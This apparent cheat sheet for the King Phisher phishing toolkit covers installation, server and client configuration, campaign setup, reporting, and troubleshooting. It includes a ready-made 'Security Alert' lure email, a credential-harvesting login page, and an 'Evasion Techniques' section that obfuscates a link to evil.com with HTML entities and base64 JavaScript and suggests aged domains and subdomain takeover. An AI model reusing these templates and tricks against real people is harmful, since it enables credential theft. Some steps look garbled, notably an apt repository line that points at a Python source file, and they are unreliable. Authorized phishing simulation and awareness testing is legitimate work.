1337skills.com

Appearance

King Phisher Social Engineering Toolkit Cheat Sheet

Overview

King Phisher is a professional-grade phishing campaign toolkit developed by RSM US LLP for testing and promoting user awareness by simulating real-world phishing attacks. It provides a complete framework for creating, managing, and analyzing phishing campaigns with advanced reporting capabilities.

⚠️ Warning: This tool is intended for authorized security testing and awareness training only. Ensure you have proper authorization before conducting any phishing campaigns.

Installation

Ubuntu/Debian Installation

bash
# Add King Phisher repository
wget -q https://github.com/rsmusllp/king-phisher/raw/master/data/client/king_phisher_icon.ico
echo 'deb https://github.com/rsmusllp/king-phisher/raw/master/data/server/king_phisher_server.py /' | sudo tee /etc/apt/sources.list.d/king-phisher.list

# Install via package manager
sudo apt update
sudo apt install king-phisher

# Manual installation
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
sudo ./tools/install.sh

CentOS/RHEL Installation

bash
# Install dependencies
sudo yum install python3 python3-pip git

# Clone repository
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install King Phisher
sudo ./tools/install.sh

Docker Installation

bash
# Build Docker image
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
docker build -t king-phisher .

# Run King Phisher server
docker run -it -p 80:80 -p 443:443 king-phisher

Basic Usage

Starting King Phisher Server

bash
# Start server with default configuration
sudo king-phisher-server

# Start with custom configuration
sudo king-phisher-server -c /path/to/config.yml

# Start with specific interface
sudo king-phisher-server -a 0.0.0.0

# Start with custom port
sudo king-phisher-server -p 8080

Starting King Phisher Client

bash
# Start GUI client
king-phisher-client

# Connect to remote server
king-phisher-client --server https://server.com

# Use specific configuration
king-phisher-client --config /path/to/client_config.json

Configuration

Server Configuration (server_config.yml)

yaml
# Basic server configuration
server:
  bind:
    host: 0.0.0.0
    port: 80
  ssl:
    enabled: true
    host: 0.0.0.0
    port: 443
    cert: /path/to/cert.pem
    key: /path/to/key.pem

# Database configuration
database:
  driver: postgresql
  host: localhost
  port: 5432
  database: king_phisher
  username: king_phisher
  password: password

# Email configuration
email:
  smtp:
    host: smtp.gmail.com
    port: 587
    username: your-email@gmail.com
    password: app-password
    use_tls: true

# Logging configuration
logging:
  level: INFO
  file: /var/log/king-phisher.log

Client Configuration

json
{
  "server": "https://king-phisher.local",
  "server_username": "username",
  "server_use_ssl": true,
  "server_verify_ssl": false,
  "gui": {
    "show_campaign_graph": true,
    "show_campaign_map": true
  }
}

Campaign Management

Creating Campaigns

bash
# Campaign components:
# 1. Email template
# 2. Landing page
# 3. Target list
# 4. SMTP configuration
# 5. Campaign settings

Email Templates

html
<!-- Professional phishing template -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Security Alert</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; }
        .header { background: #d32f2f; color: white; padding: 10px; }
        .content { padding: 20px; }
        .button { background: #1976d2; color: white; padding: 10px 20px; text-decoration: none; }
    </style>
</head>
<body>
    <div class="header">
        <h2>Security Alert - Immediate Action Required</h2>
    </div>
    <div class="content">
        <p>Dear {{ client.first_name }} {{ client.last_name }},</p>
        <p>We have detected suspicious activity on your account associated with {{ client.email_address }}.</p>
        <p>Please verify your account immediately to prevent suspension.</p>
        <p><a href="{{ url.webserver }}" class="button">Verify Account Now</a></p>
        <p>This link will expire in 24 hours.</p>
        <p>Best regards,<br>IT Security Team</p>
    </div>
</body>
</html>

Landing Pages

html
<!-- Credential harvesting page -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Account Verification</title>
    <style>
        body { font-family: Arial, sans-serif; background: #f5f5f5; margin: 0; padding: 50px; }
        .container { max-width: 400px; margin: auto; background: white; padding: 30px; border-radius: 5px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
        input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; }
        button { width: 100%; background: #1976d2; color: white; padding: 12px; border: none; border-radius: 3px; cursor: pointer; }
        .logo { text-align: center; margin-bottom: 30px; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <h2>Account Verification</h2>
        </div>
        <form method="post" action="{{ url.webserver }}">
            <input type="hidden" name="rid" value="{{ client.uid }}">
            <input type="text" name="username" placeholder="Username or Email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Verify Account</button>
        </form>
        <p style="font-size: 12px; color: #666; text-align: center; margin-top: 20px;">
            This verification is required to maintain account security.
        </p>
    </div>
</body>
</html>

Target Lists

csv
# CSV format for target import
first_name,last_name,email_address,department,company
John,Doe,john.doe@company.com,IT,Acme Corp
Jane,Smith,jane.smith@company.com,HR,Acme Corp
Bob,Johnson,bob.johnson@company.com,Finance,Acme Corp
Alice,Williams,alice.williams@company.com,Marketing,Acme Corp

Advanced Features

Template Variables

html
<!-- Available template variables -->
{{ client.first_name }}        <!-- Target's first name -->
{{ client.last_name }}         <!-- Target's last name -->
{{ client.email_address }}     <!-- Target's email -->
{{ client.company_name }}      <!-- Target's company -->
{{ client.department }}        <!-- Target's department -->
{{ url.webserver }}            <!-- Tracking URL -->
{{ url.tracking_image }}       <!-- Tracking pixel -->
{{ time.local }}               <!-- Local timestamp -->
{{ time.utc }}                 <!-- UTC timestamp -->

Custom Fields

python
# Add custom fields to campaigns
custom_fields = {
    'employee_id': 'EMP001',
    'manager': 'John Manager',
    'location': 'New York Office',
    'security_level': 'Standard'
}

Plugins and Extensions

python
# King Phisher plugin structure
import king_phisher.plugins as plugin_manager

class CustomPlugin(plugin_manager.ClientPlugin):
    authors = ['Your Name']
    title = 'Custom Plugin'
    description = 'Custom functionality for King Phisher'
    version = '1.0'
    
    def initialize(self):
        # Plugin initialization code
        pass
    
    def finalize(self):
        # Plugin cleanup code
        pass

Reporting and Analytics

Campaign Statistics

python
# Access campaign data via API
import king_phisher.client.client_rpc as client_rpc

# Connect to server
rpc = client_rpc.KingPhisherRPCClient(
    ('server.com', 443),
    username='admin',
    password='password',
    use_ssl=True
)

# Get campaign statistics
campaign_id = 1
stats = rpc.remote_table_row('campaigns', campaign_id)
messages = rpc.remote_table('messages', query_filter={'campaign_id': campaign_id})
visits = rpc.remote_table('visits', query_filter={'campaign_id': campaign_id})
credentials = rpc.remote_table('credentials', query_filter={'campaign_id': campaign_id})

print(f"Messages sent: {len(messages)}")
print(f"Visits: {len(visits)}")
print(f"Credentials harvested: {len(credentials)}")

Geographic Analysis

python
# Analyze visitor geographic data
import geoip2.database

def analyze_visitor_locations(visits):
    reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
    locations = {}
    
    for visit in visits:
        try:
            response = reader.city(visit['visitor_ip'])
            country = response.country.name
            city = response.city.name
            
            location = f"{city}, {country}"
            locations[location] = locations.get(location, 0) + 1
        except:
            pass
    
    return locations

Timeline Analysis

python
# Analyze campaign timeline
import datetime
import matplotlib.pyplot as plt

def plot_campaign_timeline(visits):
    timestamps = [datetime.datetime.fromisoformat(v['visit_time']) for v in visits]
    timestamps.sort()
    
    # Group by hour
    hourly_counts = {}
    for ts in timestamps:
        hour = ts.replace(minute=0, second=0, microsecond=0)
        hourly_counts[hour] = hourly_counts.get(hour, 0) + 1
    
    # Plot timeline
    hours = list(hourly_counts.keys())
    counts = list(hourly_counts.values())
    
    plt.figure(figsize=(12, 6))
    plt.plot(hours, counts, marker='o')
    plt.title('Campaign Activity Timeline')
    plt.xlabel('Time')
    plt.ylabel('Visits')
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.savefig('campaign_timeline.png')

Security Features

SSL/TLS Configuration

bash
# Generate SSL certificate
openssl req -newkey rsa:4096 -nodes -keyout king-phisher.key -x509 -days 365 -out king-phisher.crt

# Configure Let's Encrypt
certbot certonly --standalone -d yourdomain.com

Authentication and Authorization

yaml
# User authentication configuration
authentication:
  provider: pam  # or ldap, database
  
# LDAP configuration
ldap:
  server: ldap://ldap.company.com
  base_dn: dc=company,dc=com
  user_filter: (sAMAccountName={username})

# Database authentication
database_auth:
  table: users
  username_column: username
  password_column: password_hash

Access Control

python
# Role-based access control
user_permissions = {
    'admin': ['campaign.create', 'campaign.delete', 'user.manage'],
    'operator': ['campaign.create', 'campaign.view'],
    'viewer': ['campaign.view']
}

API Integration

REST API Usage

python
# King Phisher REST API client
import requests
import json

class KingPhisherAPI:
    def __init__(self, server_url, username, password):
        self.server_url = server_url
        self.session = requests.Session()
        self.authenticate(username, password)
    
    def authenticate(self, username, password):
        auth_data = {
            'username': username,
            'password': password
        }
        response = self.session.post(f"{self.server_url}/api/login", json=auth_data)
        return response.status_code == 200
    
    def get_campaigns(self):
        response = self.session.get(f"{self.server_url}/api/campaigns")
        return response.json()
    
    def create_campaign(self, campaign_data):
        response = self.session.post(f"{self.server_url}/api/campaigns", json=campaign_data)
        return response.json()
    
    def get_campaign_stats(self, campaign_id):
        response = self.session.get(f"{self.server_url}/api/campaigns/{campaign_id}/stats")
        return response.json()

Webhook Integration

python
# Webhook for real-time notifications
from flask import Flask, request
import json

app = Flask(__name__)

@app.route('/webhook', methods=['POST'])
def handle_webhook():
    data = request.get_json()
    
    if data['event_type'] == 'visit':
        # Handle website visit
        print(f"New visit from {data['visitor_ip']}")
    elif data['event_type'] == 'credentials':
        # Handle credential submission
        print(f"Credentials submitted: {data['username']}")
    
    return 'OK'

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

Evasion Techniques

Email Evasion

html
<!-- Use legitimate-looking domains -->
From: IT Security <security@company-portal.com>

<!-- Mimic legitimate services -->
Subject: [Action Required] Account Security Verification

<!-- Use URL shorteners or redirects -->
<a href="https://company-portal.com/redirect?url=https://evil.com">Click Here</a>

<!-- Hide tracking with CSS -->
<img src="{{ url.tracking_image }}" style="display:none;width:1px;height:1px;">

Domain Reputation

bash
# Use aged domains
# Purchase expired domains with good reputation
# Use subdomain takeover techniques
# Implement proper SPF/DKIM/DMARC records

# Example SPF record
v=spf1 include:_spf.google.com ~all

# Example DKIM record
v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC...

# Example DMARC record
v=DMARC1; p=quarantine; rua=mailto:dmarc@company.com

Content Obfuscation

html
<!-- Use HTML entities -->
<a href="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#101;&#118;&#105;&#108;&#46;&#99;&#111;&#109;">Verify Account</a>

<!-- Use base64 encoding -->
<script>
var encoded = "aHR0cHM6Ly9ldmlsLmNvbQ==";
var decoded = atob(encoded);
window.location.href = decoded;
</script>

<!-- Use CSS tricks -->
<span style="display:none;">PHISHING</span>Legitimate<span style="display:none;">ATTACK</span> Content

Troubleshooting

Server Issues

bash
# Check server status
sudo systemctl status king-phisher

# View server logs
sudo journalctl -u king-phisher -f

# Test server connectivity
curl -k https://localhost/ping

# Check database connection
sudo -u king-phisher psql -d king_phisher -c "SELECT version();"

Email Delivery Issues

bash
# Test SMTP configuration
python3 -c "
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login('user@gmail.com', 'password')
server.quit()
print('SMTP connection successful')
"

# Check DNS records
dig TXT company.com | grep spf
dig TXT _domainkey.company.com
dig TXT _dmarc.company.com

# Test email deliverability
echo 'Test email' | mail -s 'Test Subject' test@company.com

SSL/TLS Issues

bash
# Verify certificate
openssl x509 -in /path/to/cert.pem -text -noout

# Test SSL configuration
openssl s_client -connect domain.com:443 -servername domain.com

# Check certificate chain
curl -vI https://domain.com

Performance Issues

bash
# Monitor resource usage
top -p $(pgrep king-phisher)

# Check database performance
sudo -u postgres psql -d king_phisher -c "
SELECT schemaname,tablename,attname,n_distinct,correlation 
FROM pg_stats 
WHERE schemaname='public';
"

# Optimize database
sudo -u postgres psql -d king_phisher -c "VACUUM ANALYZE;"

Resources

This cheat sheet provides a comprehensive reference for using King Phisher. Always ensure you have proper authorization and follow ethical guidelines when conducting phishing simulations.